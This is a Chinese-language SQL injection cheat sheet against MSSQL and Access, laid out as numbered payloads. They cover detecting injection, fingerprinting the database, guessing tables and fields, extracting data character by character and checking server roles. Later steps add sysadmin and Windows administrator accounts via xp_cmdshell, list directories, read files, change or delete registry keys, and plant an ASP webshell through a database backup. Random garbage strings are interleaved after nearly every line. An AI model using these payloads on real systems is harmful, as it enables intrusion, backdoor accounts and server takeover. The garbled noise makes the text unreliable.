1.判断是否有注入;and 1=1 ;and 1=2 �[m�SK!Y@u
2.初步判断是否是mssql ;and user>0 # $:ddO�Y�
y&0&K��4aa
3.注入参数是字符'and [查询条件] and ''=' uA�?_\�z?�
8 �oHyN�o�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �\(a9�rZ�9
cJ�
�G><'�
5.判断数据库系统 Lc|5&<8ZG1
];waK�2'�2
;and (select count(*) from sysobjects)>0 mssql e!wS�"[,�
�S�WjOJjn�
;and (select count(*) from msysobjects)>0 access Ge+&C RhyX
wX6VapFboI
()}B]���?�
4]N��`pD�5
6.猜数据库 ;and (select Count(*) from [数据库名])>0 2kTLj2�@o,
AW8�"��@��
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 /3*����7�5
x@F"ZiYD@O
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ����j:%~�:
@L%9N�qE`O
9.(1)猜字段的ascii值(access) �*�'+O�A�6
Gd)@P�W��K
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 I�B�x?MU#.
+igFI�oHTM
(2)猜字段的ascii值(mssql) V8>�%$O
sw
WV5gH�*uUa
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 e�x8m�A�6g
P5ii3�a?�R
10.测试权限结构(mssql) D�g]�ua5jk
A2z%�zMlZc
�B.�&l�y/d
�;l�_%�;O5
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ,Cg�u�Y/y�
Z8$@}|jN��
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- rN)T xH&*p
H#8]Lb�@@:
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 4A%O`&�e�Z
�OHzI!�,2]
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- S]�Gw}d]4�
�br"p D-}
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �fbS�l$jn.
uXuMt
a*�Y
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- o<e��� AZ�
�N}wi<P:*)
;and 1=(select IS_MEMBER('db_owner'));-- NY�D#I{��h
[�{_JO+)+n
�CTt3W>'=+
06I'�#:��]
11.添加mssql和系统的帐户 $|!�VP'VI�
{A4"K�X(U�
;exec master.dbo.sp_addlogin username;-- `LL��#Ai�a
;exec master.dbo.sp_password null,username,password;-- 7-+X -Y?��
"k\W2,�q�[
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- rr�2'b�f<]
b1�>%��%�#
;exec master.dbo.xp_cmdshell 'net user username password >R�/^|�hnJ
+� )?1F���
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- _;J�7#�j~}
�([s}bD.�9
;exec master.dbo.xp_cmdshell 'net user username password /add';-- F]3iL^��v
�x+(��h#+F
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Z>N�r"7�k�
De[!^/f;T�
�y��";{�k+
pi? q<�p�%
12.(1)遍历目录 =�^4 vz=�2
)'M<�q,@<(
;create table dirs(paths varchar(100), id int) �mFOu�E�5
*J@2A)ZDv0
;insert dirs exec master.dbo.xp_dirtree 'c:\' 7Xv.�C&jzd
�%;9f$��:U
;and (select top 1 paths from dirs)>0 �!z �X`M1J
eKpH|S!x�U
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �yNAvXk��p
I �ms?^`N
b�T>%�
*�
8QDRlF:�;<
(2)遍历目录 uk_?2?>-5�
0X#�tt`;
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- BCF-�lrZ�&
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��gNl���@T
aT"�q}UT�K
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 =��LuH:VM&
�
N\��DEY]
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �GAbX.9[V�
v')Fq[H
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 }4L�v-9s,
$�k*E^~qT
[g�/Hf�(&
�!1!;}uz�t
13.mssql中的存储过程 \uQB%yM�oz
]i\D*,Ff�U
xp_regenumvalues 注册表根键, 子键 �t/�HM���J
=0`�"T!��1
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ]7v-���q�d
r#rQ�3&�Vn
xp_regread 根键,子键,键值名 �#b []-L!
�?�)-*&1cv
;exec xp_regread ^V v�7u@y�
bAt%^pc=�y
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �^x�%��yIS
E=GCq=�Uw
xp_regwrite 根键,子键, 值名, 值类型, 值 J�Aen=�%2b
W'rf��t@J$
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 gIep6nq1`|
'� �A= ��x
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 k}l5���v)m
�e�{.2*>pH
xp_regdeletevalue 根键,子键,值名 ��"m��):"�
c[?S}u|['
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 n�K1�XJp��
j/wG0�~<kz
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 \d�CoY0Z ;
�<6U�{�I '
eI8���^T?�
H:4�r�6-�{
14.mssql的backup创建webshell 5� |{0|mP�
��3D�+>NB
use model 6T&6N0y�+9
+�w:[By��"
create table cmd(str image); �Z<��K�[�
Jz 'm&m�u�
insert into cmd(str) values (''); %I;e�j{*c�
�J6_�H��lt
backup database model to disk='c:\l.asp'; ���gvY�a&N
$
w:Q�J~,s
d�gE|*1�/0
.l"����_f�
15.mssql内置函数 `Z>4�}�<~+
:}FMau�Hh�
;and (select @@version)>0 获得Windows的版本号 .
[+ObF9=�
Y(78q�s�1w
;and user_name()='dbo' 判断当前系统的连接用户是不是sa '� �~�lC85
YN9�ug3O+�
;and (select user_name())>0 爆当前系统的连接用户 {�-J�/
<a@
Wk$[;>N�U3
;and (select db_name())>0 得到当前连接的数据库 '81$8x�xdY
KQaw*T[Q3w
�qbu L�cy3
��#*��j��
16.简洁的webshell {�l�.) *#O
1$�?�O5.X:
use model x�KEHN�gen
�tn+i5�Eso
create table cmd(str image); *5sr\b4#S�
�1Jc-hr�N-
insert into cmd(str) values (''); g&O�%�qX-
5�G'X\��iR
backup database model to disk='g:\wwwtest\l.asp';
